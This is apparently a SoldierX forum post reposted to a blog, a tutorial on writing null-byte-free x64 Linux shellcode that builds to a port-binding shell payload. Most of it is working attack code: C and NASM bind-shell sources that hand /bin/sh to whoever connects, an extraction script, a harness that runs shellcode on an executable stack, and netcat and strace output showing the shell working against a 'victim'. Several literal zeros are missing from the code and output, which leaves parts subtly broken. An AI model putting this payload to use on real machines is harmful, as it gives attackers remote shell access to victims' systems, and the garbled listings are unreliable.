[ + ] Repost of Shellcode Programming

Due to the lack of availability of info on the topic I've decided to re-post this on my blog, I feel it's something I'd like to look back to if I need it:

Initially before writing this I thought to myself that because I had worked really hard on this matter (give or take about two weeks or so of constant hammering), I have just opened doors that were previously closed to me due to the passage of time and how things change. But I was convinced that what this community stands for, and how without it and someone there to guide me on this journey I'd be lost as hell. So I figured I'd give back by sharing what I've learned recently, which is creating shellcode for a portbind attack... however, the difference between what is commonly used to make it and my version of doing so, is that I use a more logical and concise method of doing it. To preface this I'm going to assume that you know x64 ASM, C network programming, and the basics of using Linux. I am also trusting that this post stays within the Soldierx community, I strongly support this community and hope to see its members cherish from this information.

If you don't know x64 ASM, I would recommend using Ray Seyfarth's Intro to x64 on Linux (and Windows for future projects):
https://www.amazon.com/s/ref=dp_byline_sr_book_1?ie=UTF8&text=Ray+Seyfar...
If you don't know C network programming I highly recommend Linux Socket Programming By Example by Warren Gay:
https://www.amazon.com/Linux-Socket-Programming-Example-Warren/dp/078972...

A lot of sources that refer to shellcode and assembly tend to be outdated and that is the biggest obstacle when reading something like the shellcoder's handbook, and often times a lot of techniques used don't work. There is a massive change in how the processor interprets shellcode now in our x64 age than it used to in x32 predecessor due to the way opcodes are interpreted and how the circuits for the AMD architecture have evolved. Why Shellcode? Because you can attach shellcode to a running process on the victim's machine, how to do this, I'll save for another time. The first thing you can start with in all of this is a simple Hello World in C:

int main(int argc, char **argv)

{

        write(1, "Hello, World!", 12);

}

Now if you copy and compile this using gcc and run the resulting a.out file you'll get the infamous hello world. But what you should be asking is why did I write it like this? No headers included or anything? The reason is because I am using what is known as a system call. Unlike write(), printf() is not something that is understood by the processor, instead printf() is something that is added by the GNU C Compiler to work with write() as well as other methods of aligning data to a string. Syscalls have individual values to them from 0 to 1024 and are contained in a header file titled unistd.h . Within Ubuntu, which is what I'm using the real name of this header file is unistd_64.h, and that's because 32 and 64 bit operating system versions have different values for individual syscalls. To find out where your unistd file is, simply use the find command to look for it and concatenate it in terminal:

find /usr/include -name unistd.h

cat <what you get here>

You can also look for syscall values on the internet for example on this page:
http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/

So lets use what we know to write our hello world script using assembly using the write syscall:

section .data

    msg db      "hello, world!"

section .text

    global _start

_start:

    mov     rax, 1

    mov     rdi, 1

    mov     rsi, msg

    mov     rdx, 13

    syscall

    mov    rax, 60

    mov    rdi, 

    syscall

using nasm to compile it and ld to link the resulting object file:

nasm -f elf64 -g hello.asm

ld -o hello hello.o

./hello

Should print out Hello world. Then you can objdump it to disassemble out the resulting shellcode:

$objdump -d hello

hello:     file format elf64-x86-64

Disassembly of section .text:

00000000004000b0 <_start>:

  4000b0:       b8 01 00 00 00          mov    $0x1,%eax

  4000b5:       bf 01 00 00 00          mov    $0x1,%edi

  4000ba:       48 be d8 00 60 00 00    movabs $0x6000d8,%rsi

  4000c1:       00 00 00 

  4000c4:       ba 0d 00 00 00          mov    $0xd,%edx

  4000c9:       0f 05                   syscall 

  4000cb:       b8 3c 00 00 00          mov    $0x3c,%eax

  4000d0:       bf 00 00 00 00          mov    $0x0,%edi

  4000d5:       0f 05                   syscall 

                ^ shellcode  ^

The problem with this shellcode is that it has too many of what we call null bytes present. What happens is that nullbytes end up cancelling out the effects of shellcode and the processor interprets them as EOF calls for our program. Ah I should add on that shellcode are the individual hex values for the processor to interpret what the program is doing for example take the first mov instruction:

\xb8\x01 ---gets interpreted by processor as --> 1011 1000 0000 0001 --to processor-->\xb8\ tells the processor you want to mov to register rax, \x01 tells the processor you want to move the value of 0x1 to it.

the extra 00s you see are a result of the entire 64 bit long register being used, which leads to me showing you this:
https://imgur.com/a/rWUz75J

There are four ways to get rid of null bytes, and I will show you how the first three are done after explaining them:
1-push the value into the stack and pop it into the register
2-move the value into the first 8 bits (or 1 byte) of the register
3-using the jump and call trick
4-for strings, write each character using ascii hex characters into the appropriate registers

And here's our hello world without all the null bytes:

global _start

section .text       

_start:

    jmp short data

shellcode:

    xor     rax,rax 

    xor     rdi, rdi

    xor     rsi, rsi

    xor     rdx, rdx

    mov     al, 1       ;1-moving into lowest byte of register

    push    byte 1      ;2-pushing the value into stack

    pop     rdi         ;2-and then popping it

    pop     rsi         ;3-popping the address of msg from stack

    mov     dl, 13      ;1-m

    syscall

    mov     al, 60

    mov     dil, 1

    syscall

data:

    call shellcode

    msg     db "Hello, World!"

Now compile it like before and objdump it:

$ objdump -d hello

hello:     file format elf64-x86-64

Disassembly of section .text:

0000000000400080 <_start>:

  400080:       eb 1d                   jmp    40009f <data>

0000000000400082 <shellcode>:

  400082:       48 31 c0                xor    %rax,%rax

  400085:       48 31 ff                xor    %rdi,%rdi

  400088:       48 31 f6                xor    %rsi,%rsi

  40008b:       48 31 d2                xor    %rdx,%rdx

  40008e:       b0 01                   mov    $0x1,%al

  400090:       6a 01                   pushq  $0x1

  400092:       5f                      pop    %rdi

  400093:       5e                      pop    %rsi

  400094:       b2 0d                   mov    $0xd,%dl

  400096:       0f 05                   syscall 

  400098:       b0 3c                   mov    $0x3c,%al

  40009a:       40 b7 01                mov    $0x1,%dil

  40009d:       0f 05                   syscall 

000000000040009f <data>:

  40009f:       e8 de ff ff ff          callq  400082 <shellcode>

00000000004000a4 <msg>:

  4000a4:       48                      rex.W

  4000a5:       65 6c                   gs insb (%dx),%es:(%rdi)

  4000a7:       6c                      insb   (%dx),%es:(%rdi)

  4000a8:       6f                      outsl  %ds:(%rsi),(%dx)

  4000a9:       2c 20                   sub    $0x20,%al

  4000ab:       57                      push   %rdi

  4000ac:       6f                      outsl  %ds:(%rsi),(%dx)

  4000ad:       72 6c                   jb     40011b <msg+0x77>

  4000af:       64                      fs

  4000b0:       21                      .byte 0x21

And it's free of null bytes!

Now all you have to do is extract and test the shellcode, to do this I've made a simple bash script from a command written by someone else on the internet that uses one command to extract the code of the objdump you can save this and chmod +x it so that it becomes a shell executable:

#!/bin/bash

PROGRAM=$1

objdump -d ./${PROGRAM}|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g' 

save this into a file and chmod it then run it with the hello program to get:

$ ./extract-shell hello

"\xeb\x1d\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\xb0\x01\x6a\x01\x5f\x5e\xb2\x0d\x0f\x05\xb0\x3c\x40\xb7\x01\x0f\x05\xe8\xde\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21"

Then copy and paste this into our C code to test the shellcode itself (I named mine test.c):

char code[]="\xeb\x1d\x48\x31\xc0\xb0\x01\x48\x31\xff\x40\xb7\x01\x48\x31\xf6\x5e\x48\x31\xd2\xb2\x0d\x0f\x05\xb0\x3c\x40\xb7\x01\x0f\x05\xe8\xde\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21";

int main(int argc, char **argv)

{

        int (*func)();

        func = (int (*)()) code;

        (int)(*func)();

}

Compile this code and run it like so (note if you get an error for execstack, you can install it on ubuntu using sudo apt install execstack:

$gcc -fno-stack-protector -z execstack test.c

$./a.out

Hello,World!

So now that you know how to write shellcode, next step is learning it to do something useful like making port binding shellcode. The theory is very simple, your shellcode will simply bind your socket to an ip address and port, in which you then duplicate the client socket to to your stdin, stdout, and stderr file descriptors, that way when you for example execute a write syscall, instead of going through your stdout file descriptor, it instead goes to the client socket file descriptor.

1)victim becomes a server<----you connect to the victim that has this shellcode --- hacker
2)you use a execve syscall to start a shell

Heres a C code I wrote for it, in this case I'm using my private ip of 192.168.1.16 and port 1234 as the target (this is my private ip):

#include <sys/socket.h>

#include <netinet/in.h>

#include <stdlib.h>

#include <unistd.h>

#include <arpa/inet.h>

#include <stdio.h>

int main()

{

        // Create the socket (man socket)

        // AF_INET for IPv4

        // SOCK_STREAM for TCP connection

        int host_sock = socket(AF_INET, SOCK_STREAM, ); //<--0 after the comma

        // Create sockaddr_in struct (man 7 ip)

        struct sockaddr_in host_addr;

        host_addr.sin_family = AF_INET;

        host_addr.sin_port = htons(1234);

        host_addr.sin_addr.s_addr = inet_addr("192.168.1.16");

        // Bind address to socket (man bind)

        bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));

        // Use the created socket to listen for connections (man listen)

        listen(host_sock, ); //<---0 after the comma

        // Accept connections, (man 2 accept) use NULLs to not store connection information from peer

        int client_sock = accept(host_sock, NULL, NULL);

        // Redirect stdin, stdout, stderr to client

        dup2(client_sock, ); //<---0 after the comma

        dup2(client_sock, 1);

        dup2(client_sock, 2);

        // Execute /bin/sh (man execve)

        execve("/bin/sh", NULL, NULL);

}

When you compile and run this it stands on standby until the hacker connects to it, in this case I'm going to use netcat which is a program that comes on most Linux systems and I believe in older versions of windows, in order to connect to the victim:

$nc 192.168.1.16 1234

echo hello!

hello!

id

uid=1000(ghost) gid=1000(ghost) groups=1000(ghost),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),128(kvm),129(ubridge),132(libvirt)

Now to try and write the shellcode for this, is harder than writing the assembly for it. So what I did that distinguishes this post from anything else available in the 4% of the internet that we can see, is that I used a C style struct in the assembly (No C involved I promise), and used logical methods of executing syscalls that correlates with the way I've written it in the C code using no fancy assembly instructions or methods of filling in the blanks:

segment .data

;struct sockaddr_in host_addr;

;host_addr.sin_family = AF_INET;

;host_addr.sin_port = htons(1234);

;host_addr.sin_addr.s_addr = inet_addr("192.168.1.16");

struc sockaddr_in

        sin_family  resw 1              ;allocate 2 bytes 

        sin_port        resw 1          ;allocate 2 bytes

        sin_addr        resd 1          ;allocate 4 bytes (for 32 bit address)

        sin_zero        resb 8          ;allocate 8 bytes (for the 0 padding)

endstruc

host_addr istruc sockaddr_in

        at sin_family, dw 0x02

        at sin_port, dw 0xd204          ;port 1234 hex translates to 4d2 written in host byte order

        at sin_addr, dd 0x1001A8C0  ;address 192.168.1.16

        at sin_zero, db 

iend

msg db "got here"

bin db "/bin/sh"

segment .text

        global _start

_start:

        ;sock= socket(AF_INET, SOCK_STREAM, 0)

        mov     rax,41

        mov             rdi,2                 ; got these values from the socket.h header file can use find /usr/include -name socket.h to find it

        mov             rsi,1

        syscall

        mov             rbx,rax                 ;save the fd!

        ;bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));

        xor             rax,rax

        xor             rdi,rdi

        xor             rsi,rsi

        xor             rdx,rdx 

        mov             rax,49                  ;load the syscall value for bind

        mov             rdi,rbx                 ;load the file descriptor we saved earlier

        mov             rsi,host_addr   ;load the address of the struct

        mov             rdx,16                  ;the size is 16 bytes

        syscall

        cmp             rax,

        jl              exit

        ;listen(host_sock, 0);

        xor             rax,rax

        xor             rdi,rdi

        xor             rsi,rsi

        xor             rdx,rdx

        mov             rax,50                  ;load the syscall value for listen

        mov             rdi,rbx                 ;load the file descriptor

        syscall 

        ;int client_sock = accept(host_sock, NULL, NULL);

        xor             rax,rax

        xor             rdi,rdi

        xor             rsi,rsi

        xor             rdx,rdx

        mov             rax,43                  ;load the syscall value for accept

        mov             rdi,rbx                 ;load the file descriptor

        syscall

        mov             rcx,rax                 ;save the client file descriptor

        ;duplicate the file descriptors into stdin, stdout,stderr

        xor             rax,rax

        xor             rdi,rdi

        xor             rsi,rsi

        mov             rax, 33

        mov             rdi, rcx

        mov             rsi, 

        syscall

        xor     rax,rax

        mov             rax, 33

        mov             rsi, 1

        syscall

        xor     rax,rax

        mov             rax, 33

        mov             rsi, 2

        syscall

        ;and finally execute /bin/sh

        xor             rax,rax

        xor             rdi,rdi

        xor             rsi,rsi

        xor             rdx,rdx

        mov             rax,59

        mov             rdi,bin

        syscall

        ;print got here (for debugging purposes)

        xor             rax, rax

        mov     rax,1

        xor             rdi, rdi

        mov             rdi,1

        xor             rsi,rsi

        mov             rsi, msg

        mov             rdx, 8 

        syscall

exit:

        ;exit

        xor             rax,rax

        mov             rax,60

        xor             rdi,rdi

        syscall

If you need help understanding how I wrote my structure, you can check out this other post I made on the programming forums here:
https://www.soldierx.com/bbs/201809/Using-structures-NASM-x64-Assembly

See the way this works is you have to know that the sockaddr_in struct is 16 bytes in length. Go over the 16 bytes and your address wont be properly filled, go too low and you end up with a segmentation fault when the bind() syscall gets executed. after that, the rest is just filling in the blanks for the individual syscalls, and as you write this, you can test out how the settings will work out using the strace program as you go to see how each syscall is being filled out and keeping in mind that 1) returned values go into rax, and 2) that each syscall has a return value to it:

$ strace -e socket,bind,listen,accept,dup2 ./portbindasm

socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3

bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) = 

listen(3, )                            = 

accept(3, NULL, NULL)                   = 4

dup2(4, )                              = 

dup2(4, 1)                              = 1

dup2(4, 2)                              = 2

----should pause here if everything goes smoothly---

+++ exited with  +++

And with that I'm going to stop here and let you, the reader, figure out how to write the shellcode for this. Until next time thanks for reading!

-------------------------------------[UPDATE:9/28/18]-----------------------------------------------------------------------------------------

So I have to admit before testing this I had a working theory that my assembly code would work without the null bytes, and after writing my iteration of it, it did; then a new problem arose, when you insert it into the C code to test the null byte free shellcode, the strace ended up showing a lot of garbage values, and where the structure for the address and everything else would be filled in, nothing would get filled out correctly in its execution. For instance,
the socket and bind syscalls would turn out as:

socket(AF_INET, SOCK_DGRAM|SIGEV, 0xffffffffffffffffff63) = -1 [ERROR BAD ADDRESS]

bind(243, {sa_family=AF_INET, sin_port=htons(56865), sin_addr=inet_addr(0xfffffffffffffff2131123213)}, 16) = -1

As a result I went ahead and did things the traditional way, in which instead of defining the sockaddr_in structure the way I did previously, I pushed the values into stack and pointed the address of the stack to the register that would hold the pointer to the values within the stack as shown below:

segment .text

        global _start

_start:

        ;sock= socket(AF_INET, SOCK_STREAM, 0)

        push    41

        pop             rax

        push    2

        pop     rdi

        push    1

        pop             rsi

        xor             rdx,rdx

        syscall

        mov             rbx,rax                         ;save the fd!

        ;bind(host_sock, (struct sockaddr *)&host_addr, sizeof(host_addr));

        mov             al,49                   ;load the syscall value for bind

        mov             dil,bl                  ;load the file descriptor we saved earlier

        ;build the sockaddr struct

        push    dword 0x1001A8C0;push my ip address into stack

        push    word  0xd204    ;push my port into stack

        push    word  2                 ;push the value for AF_INET 

        mov             rcx,rsp                 ;move the stack pointer into rcx

        mov             rsi,rcx                 ;move rcx into the second argument of bind()

        mov             dl,16                   ;the size is 16 bytes

        syscall

        ;listen(host_sock, 0);

        xor             rax,rax                 ;zero out the argument registers

        xor             rdi,rdi

        xor             rsi,rsi

        xor             rdx,rdx

        mov             al,50                   ;load the syscall value for listen

        mov             dil,bl                  ;load the file descriptor

        syscall 

        ;int client_sock = accept(host_sock, NULL, NULL);

        xor             rax,rax                 ;zero out the argument registers

        xor             rdi,rdi

        xor             rsi,rsi

        xor             rdx,rdx

        mov             al,43                   ;load the syscall value for accept

        mov             dil,bl                  ;load the file descriptor

        syscall

        mov             cl,al                   ;save the client file descriptor

        ;duplicate the file descriptors into stdin, stdout,stderr

        xor             rax,rax                 ;zero out the argument registers

        xor             rdi,rdi

        xor             rsi,rsi

        mov             al, 33

        mov             dil, cl

        syscall

        xor     rax,rax

        mov             al, 33

        mov             sil, 1

        syscall

        xor     rax,rax

        mov             al, 33

        mov             sil, 2

        syscall

        ;finally execute execve (where the problem is)

        xor     rax,rax

        push    rax

        xor     rdx,rdx

        xor     rsi,rsi

        mov     rbx,0x68732f2f6e69622f

        push    rbx

        push    rsp

        pop     rdi

        mov     al,0x3b 

        syscall

        ;exit

        xor             rax,rax

        mov             al,60

        xor             rdi,rdi

        syscall

And after putting it in the shellcode generated for this in the test code created in C, the problem is in the execve call, where what should be "/bin/sh" turns into "/bin/shS", meaning 1 byte, is getting in the way of this finally executing:

$ strace -e socket,bind,accept,dup2,execve ./a.out

execve("./a.out", ["./a.out"], 0x7fffa9515d50 /* 58 vars */) = 

socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3

bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) = 

accept(3, NULL, NULL)                   = 4

dup2(4, )                              = 

dup2(4, 1)                              = 1

dup2(4, 2)                              = 2

execve("/bin/shS", NULL, NULL)          = -1 ENOENT (No such file or directory) <------------problem

                        ^

I have tried a lot of the things spread around within the internet, at this point I'm thinking that it could be Ubuntu, if you guys find anything that can make it work feel free to reply but until I can figure out how to fix this, all I can do is apologize and keep trying to look for a solution.

-------------------------------------[UPDATE:9/29/18]-----------------------------------------------------------------------------------------
ALAS, I have found the persistent problem with my code, the issue was that execve was getting the wrong info from the shellcode. I was puzzled by the fact that when I tried solutions to the execve problem, by rewriting the exact same x64 codes and running them the way I showed in this tutorial, the codes ended up in execve turning up with an iteration of "/bin/sh" that didn't work. So I figured, what if I copy and paste the shellcode on the website on exploit DB, and it worked, and the guy showed the objdump of the execve file along with it! Then it hit me, what if my shellcode wasn't being extracted correctly this whole time, and that was exactly the case! Here I'll show you:

$ objdump --disassemble execve

execve:     file format elf64-x86-64

Disassembly of section .text:

0000000000400080 <_start>:

  400080:       48 31 c0                xor    %rax,%rax

  400083:       50                      push   %rax

  400084:       48 31 d2                xor    %rdx,%rdx

  400087:       48 31 f6                xor    %rsi,%rsi

  40008a:       48 bb 2f 62 69 6e 2f    movabs $0x68732f2f6e69622f,%rbx

  400091:       2f 73 68 

  400094:       53                      push   %rbx

  400095:       54                      push   %rsp

  400096:       5f                      pop    %rdi

  400097:       b0 3b                   mov    $0x3b,%al

  400099:       0f 05                   syscall 

$ ./extract-shell execve

"\x48\x31\xc0\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"

                                                                                  ^if you notice, after \xbb\x2f there should be another \x2f

The idea of the execve shellcode is to run either "\\bin\sh" or "\bin\\sh" because this way the entire memory location gets filled upon pushing the buffer onto the stack. Keep in mind that I use an AMD FX 4300 processor, so I don't know if stack frames have more than 32 bits in length in modern intel processors, but to keep things simple, yes my stack memory locations are 32 bits long each; regardless, execve is built to handle our little "typo". So to fix this problem you could simply add the extra \x2f and testing the resulting shellcode then gives:

$ strace -e socket,dup2,accept,bind,execve ./a.out

execve("./a.out", ["./a.out"], 0x7fffffffdfd0 /* 58 vars */) = 

socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 3

bind(3, {sa_family=AF_INET, sin_port=htons(1234), sin_addr=inet_addr("192.168.1.16")}, 16) = 

accept(3, NULL, NULL)                   = 4

dup2(4, )                              = 

dup2(4, 1)                              = 1

dup2(4, 2)                              = 2

execve("//bin/sh", NULL, NULL)          =

Success!

SOLDIERX.COM Nobody Can Stop Information Insemination

User login

Navigation

Active forum topics

Who's online

Who's new

[ + ] Repost of Shellcode Programming